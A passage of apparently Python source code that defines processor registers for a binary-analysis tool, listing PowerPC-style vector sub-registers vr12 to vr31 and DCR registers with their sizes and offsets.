Register('vr12_8_15', 1, 0x42c0),
Register('vr12_8_14', 1, 0x42c1),
Register('vr12_16_6', 2, 0x42c2),
Register('vr12_8_13', 1, 0x42c2),
Register('vr12_8_12', 1, 0x42c3),
Register('vr12_32_2', 4, 0x42c4),
Register('vr12_16_5', 2, 0x42c4),
Register('vr12_8_11', 1, 0x42c4),
Register('vr12_8_10', 1, 0x42c5),
Register('vr12_16_4', 2, 0x42c6),
Register('vr12_8_9', 1, 0x42c6),
Register('vr12_8_8', 1, 0x42c7),
Register('vr12_64_0', 8, 0x42c8),
Register('vr12_32_1', 4, 0x42c8),
Register('vr12_16_3', 2, 0x42c8),
Register('vr12_8_7', 1, 0x42c8),
Register('vr12_8_6', 1, 0x42c9),
Register('vr12_16_2', 2, 0x42ca),
Register('vr12_8_5', 1, 0x42ca),
Register('vr12_8_4', 1, 0x42cb),
Register('vr12_32_0', 4, 0x42cc),
Register('vr12_16_1', 2, 0x42cc),
Register('vr12_8_3', 1, 0x42cc),
Register('vr12_8_2', 1, 0x42cd),
Register('vr12_16_0', 2, 0x42ce),
Register('vr12_8_1', 1, 0x42ce),
Register('vr12_8_0', 1, 0x42cf),
Register('vs45', 16, 0x42d0),
Register('vr13_64_1', 8, 0x42d0),
Register('vr13_32_3', 4, 0x42d0),
Register('vr13_16_7', 2, 0x42d0),
Register('vr13_8_15', 1, 0x42d0),
Register('vr13_8_14', 1, 0x42d1),
Register('vr13_16_6', 2, 0x42d2),
Register('vr13_8_13', 1, 0x42d2),
Register('vr13_8_12', 1, 0x42d3),
Register('vr13_32_2', 4, 0x42d4),
Register('vr13_16_5', 2, 0x42d4),
Register('vr13_8_11', 1, 0x42d4),
Register('vr13_8_10', 1, 0x42d5),
Register('vr13_16_4', 2, 0x42d6),
Register('vr13_8_9', 1, 0x42d6),
Register('vr13_8_8', 1, 0x42d7),
Register('vr13_64_0', 8, 0x42d8),
Register('vr13_32_1', 4, 0x42d8),
Register('vr13_16_3', 2, 0x42d8),
Register('vr13_8_7', 1, 0x42d8),
Register('vr13_8_6', 1, 0x42d9),
Register('vr13_16_2', 2, 0x42da),
Register('vr13_8_5', 1, 0x42da),
Register('vr13_8_4', 1, 0x42db),
Register('vr13_32_0', 4, 0x42dc),
Register('vr13_16_1', 2, 0x42dc),
Register('vr13_8_3', 1, 0x42dc),
Register('vr13_8_2', 1, 0x42dd),
Register('vr13_16_0', 2, 0x42de),
Register('vr13_8_1', 1, 0x42de),
Register('vr13_8_0', 1, 0x42df),
Register('vs46', 16, 0x42e0),
Register('vr14_64_1', 8, 0x42e0),
Register('vr14_32_3', 4, 0x42e0),
Register('vr14_16_7', 2, 0x42e0),
Register('vr14_8_15', 1, 0x42e0),
Register('vr14_8_14', 1, 0x42e1),
Register('vr14_16_6', 2, 0x42e2),
Register('vr14_8_13', 1, 0x42e2),
Register('vr14_8_12', 1, 0x42e3),
Register('vr14_32_2', 4, 0x42e4),
Register('vr14_16_5', 2, 0x42e4),
Register('vr14_8_11', 1, 0x42e4),
Register('vr14_8_10', 1, 0x42e5),
Register('vr14_16_4', 2, 0x42e6),
Register('vr14_8_9', 1, 0x42e6),
Register('vr14_8_8', 1, 0x42e7),
Register('vr14_64_0', 8, 0x42e8),
Register('vr14_32_1', 4, 0x42e8),
Register('vr14_16_3', 2, 0x42e8),
Register('vr14_8_7', 1, 0x42e8),
Register('vr14_8_6', 1, 0x42e9),
Register('vr14_16_2', 2, 0x42ea),
Register('vr14_8_5', 1, 0x42ea),
Register('vr14_8_4', 1, 0x42eb),
Register('vr14_32_0', 4, 0x42ec),
Register('vr14_16_1', 2, 0x42ec),
Register('vr14_8_3', 1, 0x42ec),
Register('vr14_8_2', 1, 0x42ed),
Register('vr14_16_0', 2, 0x42ee),
Register('vr14_8_1', 1, 0x42ee),
Register('vr14_8_0', 1, 0x42ef),
Register('vs47', 16, 0x42f0),
Register('vr15_64_1', 8, 0x42f0),
Register('vr15_32_3', 4, 0x42f0),
Register('vr15_16_7', 2, 0x42f0),
Register('vr15_8_15', 1, 0x42f0),
Register('vr15_8_14', 1, 0x42f1),
Register('vr15_16_6', 2, 0x42f2),
Register('vr15_8_13', 1, 0x42f2),
Register('vr15_8_12', 1, 0x42f3),
Register('vr15_32_2', 4, 0x42f4),
Register('vr15_16_5', 2, 0x42f4),
Register('vr15_8_11', 1, 0x42f4),
Register('vr15_8_10', 1, 0x42f5),
Register('vr15_16_4', 2, 0x42f6),
Register('vr15_8_9', 1, 0x42f6),
Register('vr15_8_8', 1, 0x42f7),
Register('vr15_64_0', 8, 0x42f8),
Register('vr15_32_1', 4, 0x42f8),
Register('vr15_16_3', 2, 0x42f8),
Register('vr15_8_7', 1, 0x42f8),
Register('vr15_8_6', 1, 0x42f9),
Register('vr15_16_2', 2, 0x42fa),
Register('vr15_8_5', 1, 0x42fa),
Register('vr15_8_4', 1, 0x42fb),
Register('vr15_32_0', 4, 0x42fc),
Register('vr15_16_1', 2, 0x42fc),
Register('vr15_8_3', 1, 0x42fc),
Register('vr15_8_2', 1, 0x42fd),
Register('vr15_16_0', 2, 0x42fe),
Register('vr15_8_1', 1, 0x42fe),
Register('vr15_8_0', 1, 0x42ff),
Register('vs48', 16, 0x4300),
Register('vr16_64_1', 8, 0x4300),
Register('vr16_32_3', 4, 0x4300),
Register('vr16_16_7', 2, 0x4300),
Register('vr16_8_15', 1, 0x4300),
Register('vr16_8_14', 1, 0x4301),
Register('vr16_16_6', 2, 0x4302),
Register('vr16_8_13', 1, 0x4302),
Register('vr16_8_12', 1, 0x4303),
Register('vr16_32_2', 4, 0x4304),
Register('vr16_16_5', 2, 0x4304),
Register('vr16_8_11', 1, 0x4304),
Register('vr16_8_10', 1, 0x4305),
Register('vr16_16_4', 2, 0x4306),
Register('vr16_8_9', 1, 0x4306),
Register('vr16_8_8', 1, 0x4307),
Register('vr16_64_0', 8, 0x4308),
Register('vr16_32_1', 4, 0x4308),
Register('vr16_16_3', 2, 0x4308),
Register('vr16_8_7', 1, 0x4308),
Register('vr16_8_6', 1, 0x4309),
Register('vr16_16_2', 2, 0x430a),
Register('vr16_8_5', 1, 0x430a),
Register('vr16_8_4', 1, 0x430b),
Register('vr16_32_0', 4, 0x430c),
Register('vr16_16_1', 2, 0x430c),
Register('vr16_8_3', 1, 0x430c),
Register('vr16_8_2', 1, 0x430d),
Register('vr16_16_0', 2, 0x430e),
Register('vr16_8_1', 1, 0x430e),
Register('vr16_8_0', 1, 0x430f),
Register('vs49', 16, 0x4310),
Register('vr17_64_1', 8, 0x4310),
Register('vr17_32_3', 4, 0x4310),
Register('vr17_16_7', 2, 0x4310),
Register('vr17_8_15', 1, 0x4310),
Register('vr17_8_14', 1, 0x4311),
Register('vr17_16_6', 2, 0x4312),
Register('vr17_8_13', 1, 0x4312),
Register('vr17_8_12', 1, 0x4313),
Register('vr17_32_2', 4, 0x4314),
Register('vr17_16_5', 2, 0x4314),
Register('vr17_8_11', 1, 0x4314),
Register('vr17_8_10', 1, 0x4315),
Register('vr17_16_4', 2, 0x4316),
Register('vr17_8_9', 1, 0x4316),
Register('vr17_8_8', 1, 0x4317),
Register('vr17_64_0', 8, 0x4318),
Register('vr17_32_1', 4, 0x4318),
Register('vr17_16_3', 2, 0x4318),
Register('vr17_8_7', 1, 0x4318),
Register('vr17_8_6', 1, 0x4319),
Register('vr17_16_2', 2, 0x431a),
Register('vr17_8_5', 1, 0x431a),
Register('vr17_8_4', 1, 0x431b),
Register('vr17_32_0', 4, 0x431c),
Register('vr17_16_1', 2, 0x431c),
Register('vr17_8_3', 1, 0x431c),
Register('vr17_8_2', 1, 0x431d),
Register('vr17_16_0', 2, 0x431e),
Register('vr17_8_1', 1, 0x431e),
Register('vr17_8_0', 1, 0x431f),
Register('vs50', 16, 0x4320),
Register('vr18_64_1', 8, 0x4320),
Register('vr18_32_3', 4, 0x4320),
Register('vr18_16_7', 2, 0x4320),
Register('vr18_8_15', 1, 0x4320),
Register('vr18_8_14', 1, 0x4321),
Register('vr18_16_6', 2, 0x4322),
Register('vr18_8_13', 1, 0x4322),
Register('vr18_8_12', 1, 0x4323),
Register('vr18_32_2', 4, 0x4324),
Register('vr18_16_5', 2, 0x4324),
Register('vr18_8_11', 1, 0x4324),
Register('vr18_8_10', 1, 0x4325),
Register('vr18_16_4', 2, 0x4326),
Register('vr18_8_9', 1, 0x4326),
Register('vr18_8_8', 1, 0x4327),
Register('vr18_64_0', 8, 0x4328),
Register('vr18_32_1', 4, 0x4328),
Register('vr18_16_3', 2, 0x4328),
Register('vr18_8_7', 1, 0x4328),
Register('vr18_8_6', 1, 0x4329),
Register('vr18_16_2', 2, 0x432a),
Register('vr18_8_5', 1, 0x432a),
Register('vr18_8_4', 1, 0x432b),
Register('vr18_32_0', 4, 0x432c),
Register('vr18_16_1', 2, 0x432c),
Register('vr18_8_3', 1, 0x432c),
Register('vr18_8_2', 1, 0x432d),
Register('vr18_16_0', 2, 0x432e),
Register('vr18_8_1', 1, 0x432e),
Register('vr18_8_0', 1, 0x432f),
Register('vs51', 16, 0x4330),
Register('vr19_64_1', 8, 0x4330),
Register('vr19_32_3', 4, 0x4330),
Register('vr19_16_7', 2, 0x4330),
Register('vr19_8_15', 1, 0x4330),
Register('vr19_8_14', 1, 0x4331),
Register('vr19_16_6', 2, 0x4332),
Register('vr19_8_13', 1, 0x4332),
Register('vr19_8_12', 1, 0x4333),
Register('vr19_32_2', 4, 0x4334),
Register('vr19_16_5', 2, 0x4334),
Register('vr19_8_11', 1, 0x4334),
Register('vr19_8_10', 1, 0x4335),
Register('vr19_16_4', 2, 0x4336),
Register('vr19_8_9', 1, 0x4336),
Register('vr19_8_8', 1, 0x4337),
Register('vr19_64_0', 8, 0x4338),
Register('vr19_32_1', 4, 0x4338),
Register('vr19_16_3', 2, 0x4338),
Register('vr19_8_7', 1, 0x4338),
Register('vr19_8_6', 1, 0x4339),
Register('vr19_16_2', 2, 0x433a),
Register('vr19_8_5', 1, 0x433a),
Register('vr19_8_4', 1, 0x433b),
Register('vr19_32_0', 4, 0x433c),
Register('vr19_16_1', 2, 0x433c),
Register('vr19_8_3', 1, 0x433c),
Register('vr19_8_2', 1, 0x433d),
Register('vr19_16_0', 2, 0x433e),
Register('vr19_8_1', 1, 0x433e),
Register('vr19_8_0', 1, 0x433f),
Register('vs52', 16, 0x4340),
Register('vr20_64_1', 8, 0x4340),
Register('vr20_32_3', 4, 0x4340),
Register('vr20_16_7', 2, 0x4340),
Register('vr20_8_15', 1, 0x4340),
Register('vr20_8_14', 1, 0x4341),
Register('vr20_16_6', 2, 0x4342),
Register('vr20_8_13', 1, 0x4342),
Register('vr20_8_12', 1, 0x4343),
Register('vr20_32_2', 4, 0x4344),
Register('vr20_16_5', 2, 0x4344),
Register('vr20_8_11', 1, 0x4344),
Register('vr20_8_10', 1, 0x4345),
Register('vr20_16_4', 2, 0x4346),
Register('vr20_8_9', 1, 0x4346),
Register('vr20_8_8', 1, 0x4347),
Register('vr20_64_0', 8, 0x4348),
Register('vr20_32_1', 4, 0x4348),
Register('vr20_16_3', 2, 0x4348),
Register('vr20_8_7', 1, 0x4348),
Register('vr20_8_6', 1, 0x4349),
Register('vr20_16_2', 2, 0x434a),
Register('vr20_8_5', 1, 0x434a),
Register('vr20_8_4', 1, 0x434b),
Register('vr20_32_0', 4, 0x434c),
Register('vr20_16_1', 2, 0x434c),
Register('vr20_8_3', 1, 0x434c),
Register('vr20_8_2', 1, 0x434d),
Register('vr20_16_0', 2, 0x434e),
Register('vr20_8_1', 1, 0x434e),
Register('vr20_8_0', 1, 0x434f),
Register('vs53', 16, 0x4350),
Register('vr21_64_1', 8, 0x4350),
Register('vr21_32_3', 4, 0x4350),
Register('vr21_16_7', 2, 0x4350),
Register('vr21_8_15', 1, 0x4350),
Register('vr21_8_14', 1, 0x4351),
Register('vr21_16_6', 2, 0x4352),
Register('vr21_8_13', 1, 0x4352),
Register('vr21_8_12', 1, 0x4353),
Register('vr21_32_2', 4, 0x4354),
Register('vr21_16_5', 2, 0x4354),
Register('vr21_8_11', 1, 0x4354),
Register('vr21_8_10', 1, 0x4355),
Register('vr21_16_4', 2, 0x4356),
Register('vr21_8_9', 1, 0x4356),
Register('vr21_8_8', 1, 0x4357),
Register('vr21_64_0', 8, 0x4358),
Register('vr21_32_1', 4, 0x4358),
Register('vr21_16_3', 2, 0x4358),
Register('vr21_8_7', 1, 0x4358),
Register('vr21_8_6', 1, 0x4359),
Register('vr21_16_2', 2, 0x435a),
Register('vr21_8_5', 1, 0x435a),
Register('vr21_8_4', 1, 0x435b),
Register('vr21_32_0', 4, 0x435c),
Register('vr21_16_1', 2, 0x435c),
Register('vr21_8_3', 1, 0x435c),
Register('vr21_8_2', 1, 0x435d),
Register('vr21_16_0', 2, 0x435e),
Register('vr21_8_1', 1, 0x435e),
Register('vr21_8_0', 1, 0x435f),
Register('vs54', 16, 0x4360),
Register('vr22_64_1', 8, 0x4360),
Register('vr22_32_3', 4, 0x4360),
Register('vr22_16_7', 2, 0x4360),
Register('vr22_8_15', 1, 0x4360),
Register('vr22_8_14', 1, 0x4361),
Register('vr22_16_6', 2, 0x4362),
Register('vr22_8_13', 1, 0x4362),
Register('vr22_8_12', 1, 0x4363),
Register('vr22_32_2', 4, 0x4364),
Register('vr22_16_5', 2, 0x4364),
Register('vr22_8_11', 1, 0x4364),
Register('vr22_8_10', 1, 0x4365),
Register('vr22_16_4', 2, 0x4366),
Register('vr22_8_9', 1, 0x4366),
Register('vr22_8_8', 1, 0x4367),
Register('vr22_64_0', 8, 0x4368),
Register('vr22_32_1', 4, 0x4368),
Register('vr22_16_3', 2, 0x4368),
Register('vr22_8_7', 1, 0x4368),
Register('vr22_8_6', 1, 0x4369),
Register('vr22_16_2', 2, 0x436a),
Register('vr22_8_5', 1, 0x436a),
Register('vr22_8_4', 1, 0x436b),
Register('vr22_32_0', 4, 0x436c),
Register('vr22_16_1', 2, 0x436c),
Register('vr22_8_3', 1, 0x436c),
Register('vr22_8_2', 1, 0x436d),
Register('vr22_16_0', 2, 0x436e),
Register('vr22_8_1', 1, 0x436e),
Register('vr22_8_0', 1, 0x436f),
Register('vs55', 16, 0x4370),
Register('vr23_64_1', 8, 0x4370),
Register('vr23_32_3', 4, 0x4370),
Register('vr23_16_7', 2, 0x4370),
Register('vr23_8_15', 1, 0x4370),
Register('vr23_8_14', 1, 0x4371),
Register('vr23_16_6', 2, 0x4372),
Register('vr23_8_13', 1, 0x4372),
Register('vr23_8_12', 1, 0x4373),
Register('vr23_32_2', 4, 0x4374),
Register('vr23_16_5', 2, 0x4374),
Register('vr23_8_11', 1, 0x4374),
Register('vr23_8_10', 1, 0x4375),
Register('vr23_16_4', 2, 0x4376),
Register('vr23_8_9', 1, 0x4376),
Register('vr23_8_8', 1, 0x4377),
Register('vr23_64_0', 8, 0x4378),
Register('vr23_32_1', 4, 0x4378),
Register('vr23_16_3', 2, 0x4378),
Register('vr23_8_7', 1, 0x4378),
Register('vr23_8_6', 1, 0x4379),
Register('vr23_16_2', 2, 0x437a),
Register('vr23_8_5', 1, 0x437a),
Register('vr23_8_4', 1, 0x437b),
Register('vr23_32_0', 4, 0x437c),
Register('vr23_16_1', 2, 0x437c),
Register('vr23_8_3', 1, 0x437c),
Register('vr23_8_2', 1, 0x437d),
Register('vr23_16_0', 2, 0x437e),
Register('vr23_8_1', 1, 0x437e),
Register('vr23_8_0', 1, 0x437f),
Register('vs56', 16, 0x4380),
Register('vr24_64_1', 8, 0x4380),
Register('vr24_32_3', 4, 0x4380),
Register('vr24_16_7', 2, 0x4380),
Register('vr24_8_15', 1, 0x4380),
Register('vr24_8_14', 1, 0x4381),
Register('vr24_16_6', 2, 0x4382),
Register('vr24_8_13', 1, 0x4382),
Register('vr24_8_12', 1, 0x4383),
Register('vr24_32_2', 4, 0x4384),
Register('vr24_16_5', 2, 0x4384),
Register('vr24_8_11', 1, 0x4384),
Register('vr24_8_10', 1, 0x4385),
Register('vr24_16_4', 2, 0x4386),
Register('vr24_8_9', 1, 0x4386),
Register('vr24_8_8', 1, 0x4387),
Register('vr24_64_0', 8, 0x4388),
Register('vr24_32_1', 4, 0x4388),
Register('vr24_16_3', 2, 0x4388),
Register('vr24_8_7', 1, 0x4388),
Register('vr24_8_6', 1, 0x4389),
Register('vr24_16_2', 2, 0x438a),
Register('vr24_8_5', 1, 0x438a),
Register('vr24_8_4', 1, 0x438b),
Register('vr24_32_0', 4, 0x438c),
Register('vr24_16_1', 2, 0x438c),
Register('vr24_8_3', 1, 0x438c),
Register('vr24_8_2', 1, 0x438d),
Register('vr24_16_0', 2, 0x438e),
Register('vr24_8_1', 1, 0x438e),
Register('vr24_8_0', 1, 0x438f),
Register('vs57', 16, 0x4390),
Register('vr25_64_1', 8, 0x4390),
Register('vr25_32_3', 4, 0x4390),
Register('vr25_16_7', 2, 0x4390),
Register('vr25_8_15', 1, 0x4390),
Register('vr25_8_14', 1, 0x4391),
Register('vr25_16_6', 2, 0x4392),
Register('vr25_8_13', 1, 0x4392),
Register('vr25_8_12', 1, 0x4393),
Register('vr25_32_2', 4, 0x4394),
Register('vr25_16_5', 2, 0x4394),
Register('vr25_8_11', 1, 0x4394),
Register('vr25_8_10', 1, 0x4395),
Register('vr25_16_4', 2, 0x4396),
Register('vr25_8_9', 1, 0x4396),
Register('vr25_8_8', 1, 0x4397),
Register('vr25_64_0', 8, 0x4398),
Register('vr25_32_1', 4, 0x4398),
Register('vr25_16_3', 2, 0x4398),
Register('vr25_8_7', 1, 0x4398),
Register('vr25_8_6', 1, 0x4399),
Register('vr25_16_2', 2, 0x439a),
Register('vr25_8_5', 1, 0x439a),
Register('vr25_8_4', 1, 0x439b),
Register('vr25_32_0', 4, 0x439c),
Register('vr25_16_1', 2, 0x439c),
Register('vr25_8_3', 1, 0x439c),
Register('vr25_8_2', 1, 0x439d),
Register('vr25_16_0', 2, 0x439e),
Register('vr25_8_1', 1, 0x439e),
Register('vr25_8_0', 1, 0x439f),
Register('vs58', 16, 0x43a0),
Register('vr26_64_1', 8, 0x43a0),
Register('vr26_32_3', 4, 0x43a0),
Register('vr26_16_7', 2, 0x43a0),
Register('vr26_8_15', 1, 0x43a0),
Register('vr26_8_14', 1, 0x43a1),
Register('vr26_16_6', 2, 0x43a2),
Register('vr26_8_13', 1, 0x43a2),
Register('vr26_8_12', 1, 0x43a3),
Register('vr26_32_2', 4, 0x43a4),
Register('vr26_16_5', 2, 0x43a4),
Register('vr26_8_11', 1, 0x43a4),
Register('vr26_8_10', 1, 0x43a5),
Register('vr26_16_4', 2, 0x43a6),
Register('vr26_8_9', 1, 0x43a6),
Register('vr26_8_8', 1, 0x43a7),
Register('vr26_64_0', 8, 0x43a8),
Register('vr26_32_1', 4, 0x43a8),
Register('vr26_16_3', 2, 0x43a8),
Register('vr26_8_7', 1, 0x43a8),
Register('vr26_8_6', 1, 0x43a9),
Register('vr26_16_2', 2, 0x43aa),
Register('vr26_8_5', 1, 0x43aa),
Register('vr26_8_4', 1, 0x43ab),
Register('vr26_32_0', 4, 0x43ac),
Register('vr26_16_1', 2, 0x43ac),
Register('vr26_8_3', 1, 0x43ac),
Register('vr26_8_2', 1, 0x43ad),
Register('vr26_16_0', 2, 0x43ae),
Register('vr26_8_1', 1, 0x43ae),
Register('vr26_8_0', 1, 0x43af),
Register('vs59', 16, 0x43b0),
Register('vr27_64_1', 8, 0x43b0),
Register('vr27_32_3', 4, 0x43b0),
Register('vr27_16_7', 2, 0x43b0),
Register('vr27_8_15', 1, 0x43b0),
Register('vr27_8_14', 1, 0x43b1),
Register('vr27_16_6', 2, 0x43b2),
Register('vr27_8_13', 1, 0x43b2),
Register('vr27_8_12', 1, 0x43b3),
Register('vr27_32_2', 4, 0x43b4),
Register('vr27_16_5', 2, 0x43b4),
Register('vr27_8_11', 1, 0x43b4),
Register('vr27_8_10', 1, 0x43b5),
Register('vr27_16_4', 2, 0x43b6),
Register('vr27_8_9', 1, 0x43b6),
Register('vr27_8_8', 1, 0x43b7),
Register('vr27_64_0', 8, 0x43b8),
Register('vr27_32_1', 4, 0x43b8),
Register('vr27_16_3', 2, 0x43b8),
Register('vr27_8_7', 1, 0x43b8),
Register('vr27_8_6', 1, 0x43b9),
Register('vr27_16_2', 2, 0x43ba),
Register('vr27_8_5', 1, 0x43ba),
Register('vr27_8_4', 1, 0x43bb),
Register('vr27_32_0', 4, 0x43bc),
Register('vr27_16_1', 2, 0x43bc),
Register('vr27_8_3', 1, 0x43bc),
Register('vr27_8_2', 1, 0x43bd),
Register('vr27_16_0', 2, 0x43be),
Register('vr27_8_1', 1, 0x43be),
Register('vr27_8_0', 1, 0x43bf),
Register('vs60', 16, 0x43c0),
Register('vr28_64_1', 8, 0x43c0),
Register('vr28_32_3', 4, 0x43c0),
Register('vr28_16_7', 2, 0x43c0),
Register('vr28_8_15', 1, 0x43c0),
Register('vr28_8_14', 1, 0x43c1),
Register('vr28_16_6', 2, 0x43c2),
Register('vr28_8_13', 1, 0x43c2),
Register('vr28_8_12', 1, 0x43c3),
Register('vr28_32_2', 4, 0x43c4),
Register('vr28_16_5', 2, 0x43c4),
Register('vr28_8_11', 1, 0x43c4),
Register('vr28_8_10', 1, 0x43c5),
Register('vr28_16_4', 2, 0x43c6),
Register('vr28_8_9', 1, 0x43c6),
Register('vr28_8_8', 1, 0x43c7),
Register('vr28_64_0', 8, 0x43c8),
Register('vr28_32_1', 4, 0x43c8),
Register('vr28_16_3', 2, 0x43c8),
Register('vr28_8_7', 1, 0x43c8),
Register('vr28_8_6', 1, 0x43c9),
Register('vr28_16_2', 2, 0x43ca),
Register('vr28_8_5', 1, 0x43ca),
Register('vr28_8_4', 1, 0x43cb),
Register('vr28_32_0', 4, 0x43cc),
Register('vr28_16_1', 2, 0x43cc),
Register('vr28_8_3', 1, 0x43cc),
Register('vr28_8_2', 1, 0x43cd),
Register('vr28_16_0', 2, 0x43ce),
Register('vr28_8_1', 1, 0x43ce),
Register('vr28_8_0', 1, 0x43cf),
Register('vs61', 16, 0x43d0),
Register('vr29_64_1', 8, 0x43d0),
Register('vr29_32_3', 4, 0x43d0),
Register('vr29_16_7', 2, 0x43d0),
Register('vr29_8_15', 1, 0x43d0),
Register('vr29_8_14', 1, 0x43d1),
Register('vr29_16_6', 2, 0x43d2),
Register('vr29_8_13', 1, 0x43d2),
Register('vr29_8_12', 1, 0x43d3),
Register('vr29_32_2', 4, 0x43d4),
Register('vr29_16_5', 2, 0x43d4),
Register('vr29_8_11', 1, 0x43d4),
Register('vr29_8_10', 1, 0x43d5),
Register('vr29_16_4', 2, 0x43d6),
Register('vr29_8_9', 1, 0x43d6),
Register('vr29_8_8', 1, 0x43d7),
Register('vr29_64_0', 8, 0x43d8),
Register('vr29_32_1', 4, 0x43d8),
Register('vr29_16_3', 2, 0x43d8),
Register('vr29_8_7', 1, 0x43d8),
Register('vr29_8_6', 1, 0x43d9),
Register('vr29_16_2', 2, 0x43da),
Register('vr29_8_5', 1, 0x43da),
Register('vr29_8_4', 1, 0x43db),
Register('vr29_32_0', 4, 0x43dc),
Register('vr29_16_1', 2, 0x43dc),
Register('vr29_8_3', 1, 0x43dc),
Register('vr29_8_2', 1, 0x43dd),
Register('vr29_16_0', 2, 0x43de),
Register('vr29_8_1', 1, 0x43de),
Register('vr29_8_0', 1, 0x43df),
Register('vs62', 16, 0x43e0),
Register('vr30_64_1', 8, 0x43e0),
Register('vr30_32_3', 4, 0x43e0),
Register('vr30_16_7', 2, 0x43e0),
Register('vr30_8_15', 1, 0x43e0),
Register('vr30_8_14', 1, 0x43e1),
Register('vr30_16_6', 2, 0x43e2),
Register('vr30_8_13', 1, 0x43e2),
Register('vr30_8_12', 1, 0x43e3),
Register('vr30_32_2', 4, 0x43e4),
Register('vr30_16_5', 2, 0x43e4),
Register('vr30_8_11', 1, 0x43e4),
Register('vr30_8_10', 1, 0x43e5),
Register('vr30_16_4', 2, 0x43e6),
Register('vr30_8_9', 1, 0x43e6),
Register('vr30_8_8', 1, 0x43e7),
Register('vr30_64_0', 8, 0x43e8),
Register('vr30_32_1', 4, 0x43e8),
Register('vr30_16_3', 2, 0x43e8),
Register('vr30_8_7', 1, 0x43e8),
Register('vr30_8_6', 1, 0x43e9),
Register('vr30_16_2', 2, 0x43ea),
Register('vr30_8_5', 1, 0x43ea),
Register('vr30_8_4', 1, 0x43eb),
Register('vr30_32_0', 4, 0x43ec),
Register('vr30_16_1', 2, 0x43ec),
Register('vr30_8_3', 1, 0x43ec),
Register('vr30_8_2', 1, 0x43ed),
Register('vr30_16_0', 2, 0x43ee),
Register('vr30_8_1', 1, 0x43ee),
Register('vr30_8_0', 1, 0x43ef),
Register('vs63', 16, 0x43f0),
Register('vr31_64_1', 8, 0x43f0),
Register('vr31_32_3', 4, 0x43f0),
Register('vr31_16_7', 2, 0x43f0),
Register('vr31_8_15', 1, 0x43f0),
Register('vr31_8_14', 1, 0x43f1),
Register('vr31_16_6', 2, 0x43f2),
Register('vr31_8_13', 1, 0x43f2),
Register('vr31_8_12', 1, 0x43f3),
Register('vr31_32_2', 4, 0x43f4),
Register('vr31_16_5', 2, 0x43f4),
Register('vr31_8_11', 1, 0x43f4),
Register('vr31_8_10', 1, 0x43f5),
Register('vr31_16_4', 2, 0x43f6),
Register('vr31_8_9', 1, 0x43f6),
Register('vr31_8_8', 1, 0x43f7),
Register('vr31_64_0', 8, 0x43f8),
Register('vr31_32_1', 4, 0x43f8),
Register('vr31_16_3', 2, 0x43f8),
Register('vr31_8_7', 1, 0x43f8),
Register('vr31_8_6', 1, 0x43f9),
Register('vr31_16_2', 2, 0x43fa),
Register('vr31_8_5', 1, 0x43fa),
Register('vr31_8_4', 1, 0x43fb),
Register('vr31_32_0', 4, 0x43fc),
Register('vr31_16_1', 2, 0x43fc),
Register('vr31_8_3', 1, 0x43fc),
Register('vr31_8_2', 1, 0x43fd),
Register('vr31_16_0', 2, 0x43fe),
Register('vr31_8_1', 1, 0x43fe),
Register('vr31_8_0', 1, 0x43ff),
Register('contextreg', 4, 0x6000),
Register('dcr000', 4, 0x7000),
Register('dcr001', 4, 0x7004),
Register('dcr002', 4, 0x7008),
Register('dcr003', 4, 0x700c),
Register('dcr004', 4, 0x7010),
Register('dcr005', 4, 0x7014),
Register('dcr006', 4, 0x7018),
Register('dcr007', 4, 0x701c),
Register('dcr008', 4, 0x7020),
Register('dcr009', 4, 0x7024),
Register('dcr00a', 4, 0x7028),
Register('dcr00b', 4, 0x702c),
Register('dcr00c', 4, 0x7030),
Register('dcr00d', 4, 0x7034),
Register('dcr00e', 4, 0x7038),
Register('dcr00f', 4, 0x703c),
Register('dcr010', 4, 0x7040),
Register('dcr011', 4, 0x7044),
Register('dcr012', 4, 0x7048),
Register('dcr013', 4, 0x704c),
Register('dcr014', 4, 0x7050),
Register('dcr015', 4, 0x7054),
Register('dcr016', 4, 0x7058),
Register('dcr017', 4, 0x705c),
Register('dcr018', 4, 0x7060),
Register('dcr019', 4, 0x7064),
Register('dcr01a', 4, 0x7068),
Register('dcr01b', 4, 0x706c),
Register('dcr01c', 4, 0x7070),
Register('dcr01d', 4, 0x7074),
Register('dcr01e', 4, 0x7078),
Register('dcr01f', 4, 0x707c),
Register('dcr020', 4, 0x7080),
Register('dcr021', 4, 0x7084),
Register('dcr022', 4, 0x7088),
Register('dcr023', 4, 0x708c),
Register('dcr024', 4, 0x7090),
Register('dcr025', 4, 0x7094),
Register('dcr026', 4, 0x7098),
Register('dcr027', 4, 0x709c),
Register('dcr028', 4, 0x70a0),
Register('dcr029', 4, 0x70a4),
Register('dcr02a', 4, 0x70a8),
Register('dcr02b', 4, 0x70ac),
Register('dcr02c', 4, 0x70b0),
Register('dcr02d', 4, 0x70b4),
Register('dcr02e', 4, 0x70b8),
Register('dcr02f', 4, 0x70bc),
Register('dcr030', 4, 0x70c0),
Register('dcr031', 4, 0x70c4),
Register('dcr032', 4, 0x70c8),
Register('dcr033', 4, 0x70cc),
Register('dcr034', 4, 0x70d0),
Register('dcr035', 4, 0x70d4),
Register('dcr036', 4, 0x70d8),
Register('dcr037', 4, 0x70dc),
Register('dcr038', 4, 0x70e0),
Register('dcr039', 4, 0x70e4),
Register('dcr03a', 4, 0x70e8),
Register('dcr03b', 4, 0x70ec),
Register('dcr03c', 4, 0x70f0),
Register('dcr03d', 4, 0x70f4),
Register('dcr03e', 4, 0x70f8),
Register('dcr03f', 4, 0x70fc),
Register('dcr040', 4, 0x7100),
Register('dcr041', 4, 0x7104),
Register('dcr042', 4, 0x7108),
Register('dcr043', 4, 0x710c),
Register('dcr044', 4, 0x7110),
Register('dcr045', 4, 0x7114),
Register('dcr046', 4, 0x7118),
Register('dcr047', 4, 0x711c),
Register('dcr048', 4, 0x7120),
Register('dcr049', 4, 0x7124),
Register('dcr04a', 4, 0x7128),
Register('dcr04b', 4, 0x712c),
Register('dcr04c', 4, 0x7130),
Register('dcr04d', 4, 0x7134),
Register('dcr04e', 4, 0x7138),
Register('dcr04f', 4, 0x713c),
Register('dcr050', 4, 0x7140),
Register('dcr051', 4, 0x7144),
Register('dcr052', 4, 0x7148),
Register('dcr053', 4, 0x714c),
Register('dcr054', 4, 0x7150),
Register('dcr055', 4, 0x7154),
Register('dcr056', 4, 0x7158),
Register('dcr057', 4, 0x715c),
Register('dcr058', 4, 0x7160),
Register('dcr059', 4, 0x7164),
Register('dcr05a', 4, 0x7168),
Register('dcr05b', 4, 0x716c),
Register('dcr05c', 4, 0x7170),
Register('dcr05d', 4, 0x7174),
Register('dcr05e', 4, 0x7178),
Register('dcr05f', 4, 0x717c),
Register('dcr060', 4, 0x7180),
Register('dcr061', 4, 0x7184),
